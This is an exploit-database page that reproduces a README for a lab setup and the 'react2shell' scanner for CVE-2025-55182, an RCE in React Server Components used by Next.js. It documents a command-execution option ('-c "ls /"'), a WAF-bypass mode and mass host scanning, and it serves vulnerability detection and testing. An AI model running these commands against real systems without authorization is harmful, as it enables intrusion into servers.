## https://sploitus.com/exploit?id=164B0414-F3F0-5CD5-9D2F-C1755CA719B3
# Affected Versions
|Component|Recommended Installation Versions|Affected Version Range|
|--|--|--|
|**Node.js**|>= 20.9.0|20.9.0 (LTS) and above|
|**Next.js**|15.0.0|15.x, 16.x(App Router)|
|**React Core**|19.0.0 or 19.2.0|19.0.0 to 19.2.0|
|**RSC Bundler**|react-server-dom-webpack|19.0.0 to 19.2.0|
# Building and Running
1. Force installation of lower versions:
```bash
cd cve-2025-55182-target
npm install --force
```
2. Verify dependency versions:
```bash
npm list react next
# Ensure the output shows next@15.0.0 and react@19.x.x
```
If the top-level dependency list shows next@15.0.0 and react@19.0.0, the environment is successfully locked in an vulnerable state. You can ignore the warnings and error messages here. 3. Build:
```Bash
npm run build
```
4. Run:
```Bash
npm start
```
The server will listen on http://localhost:3000. The environment is set up; you can now proceed with vulnerability detection. # Example
- Vulnerability Detection/Scan:
```bash
cd React2shell
python3 scanner.py -u http://127.0.0.1:3000/
```
- RCE Detection:
```bash
python3 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
```


# References
[react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
## react2shell-scanner
A command-line tool for detecting vulnerabilities in React Server Components (RSC) in Next.js applications, including CVE-2025-55182 and CVE-2025-66478. For detailed information on vulnerability techniques and detection methods, please refer to our blog post: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478
## How It Works
By default, the scanner sends a specially crafted multipart POST request containing an RCE validation payload for performing deterministic mathematical operations (e.g., 41*271 = 11111). Vulnerable servers will return the result as a response header with `X-Action-Redirect` parameter, ending with `/login?a=11111`. The scanner first tests the root path. If the root path is not vulnerable, it will follow a same-origin redirect (e.g., from `/` to `/en/`) and test the redirected target. Cross-origin redirections are not tested. ### Safe Detection Mode
Use the `--safe-check` flag to enable safe detection mode, which relies on bypass signals such as 500 status codes and specific error summaries without executing code on the target. Use this mode when you do not want to execute RCE checks. ### WAF Bypass
Use the `--waf-bypass` flag to add random interference data before the multipart request body. This helps bypass WAF detections that only analyze the first part of the request body. The default size is 128KB; you can configure it using `--waf-bypass-size`. When WAF bypass is enabled, the timeout automatically increases to 20 seconds (unless explicitly set otherwise). ### Windows Mode
Using the `--windows` flag will replace the payload from the Unix shell (`echo $((41*271))`) with PowerShell (`powershell -c "41*271"`), suitable for targets running on Windows.
## Environment Requirements
- Python 3.9+
- requests
- tqdm
## Installation
```
pip install -r requirements.txt
```
## Usage
**Scanning a single host:**
```
python3 scanner.py -u https://example.com
```
**Scanning a list of hosts:**
```
python3 scanner.py -l hosts.txt
```
**Scanning with multiple threads and saving results:**
```
python3 scanner.py -l hosts.txt -t 20 -o results.json
```
**Scanning with custom request headers:**
```
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"
```
**Safe bypass detection:**
```
python3 scanner.py -u https://example.com --safe-check
```
**Scanning Windows targets:**
```
python3 scanner.py -u https://example.com --windows
```
**Bypassing WAF with interference data:**
```
python3 scanner.py -u https://example.com --waf-bypass
```
**Executing RCE commands:**
```
python3 scanner.py -u https://example.com -c "ls /"
```
## Option Descriptions
```
-u, --url Single URL to be checked
-c, --cmd Command to execute
-l, --list List of hosts (one per line)
-t, --threads Number of concurrent threads (default: 10)
--timeout Timeout for requests (seconds, default: 10)
-o, --output Output file for results (JSON format)
--all-results Save all results, not only hosts with vulnerabilities
-k, --insecure Disable SSL certificate verification
-H, --header Custom request headers (multiple uses allowed)
-v, --verbose Display details of hosts with vulnerabilities
-q, --quiet Only output hosts with vulnerabilities
--no-color Disable color output
--safe-check Use safe bypass detection instead of RCE PoC
--windows Replace Unix shell with Windows PowerShell payload
--waf-bypass Add interference data to bypass WAF content detection
--waf-bypass-size Size of interference data (KB, default: 128)
```
## Thanks
The RCE PoC was originally disclosed by [@maple3142](https://x.com/maple3142) – we are very grateful for their contributions in making this tool available. This tool was initially developed to detect RCE vulnerabilities. This feature can still be used in the `--safe-check` safe detection mode.
- **Assetnote Security Research Team**: [Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah](https://x.com/assetnote)
- [xEHLE_](https://x.com/xEHLE_) – Reflecting RCE output in response headers
- [Nagli](https://x.com/galnagli)
## Output
Results are displayed in the terminal. When using the `-o` parameter, hosts with vulnerabilities are saved as a JSON file, including complete HTTP requests and responses for verification.
[source-iocs-preserved url=http://localhost:3000]